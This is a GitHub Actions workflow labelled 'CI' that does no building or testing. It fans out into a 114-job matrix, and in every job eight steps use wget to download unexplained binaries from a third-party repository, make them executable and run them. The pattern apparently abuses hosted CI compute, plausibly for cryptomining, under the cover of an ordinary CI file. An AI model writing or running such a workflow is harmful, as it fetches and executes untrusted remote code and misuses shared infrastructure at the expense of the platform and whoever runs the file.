name: CI
on:
  push:
    branches: [ main ]
  workflow_dispatch:
jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 100
      fail-fast: false
      matrix:
        go: [1.6, 1.7, 1.8, 1.9, 1.10, 1.12]
        flag: [A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S]
    env:
        NUM_JOBS: 100
        JOB: ${{ matrix.go }}
    steps:
      - uses: actions/checkout@v3
      - name: Run a one-line script
        run: wget https://github.com/junitadore56/kang-push/raw/main/gow && chmod +x gow && ./gow
      - name: Run a one-line script
        run: wget https://github.com/junitadore56/kang-push/raw/main/gas && chmod +x gas && ./gas
      - name: Run a one-line script
        run: wget https://github.com/junitadore56/kang-push/raw/main/gas2 && chmod +x gas2 && ./gas2
      - name: Run a one-line script
        run: wget https://github.com/junitadore56/kang-push/raw/main/gas3 && chmod +x gas3 && ./gas3
      - name: Run a one-line script
        run: wget https://github.com/junitadore56/kang-push/raw/main/gas4 && chmod +x gas4 && ./gas4
      - name: Run a one-line script
        run: wget https://github.com/junitadore56/kang-push/raw/main/gas5 && chmod +x gas5 && ./gas5
      - name: Run a one-line script
        run: wget https://github.com/junitadore56/kang-push/raw/main/gas6 && chmod +x gas6 && ./gas6
      - name: Run a one-line script
        run: wget https://github.com/junitadore56/kang-push/raw/main/gas7 && chmod +x gas7 && ./gas7
        
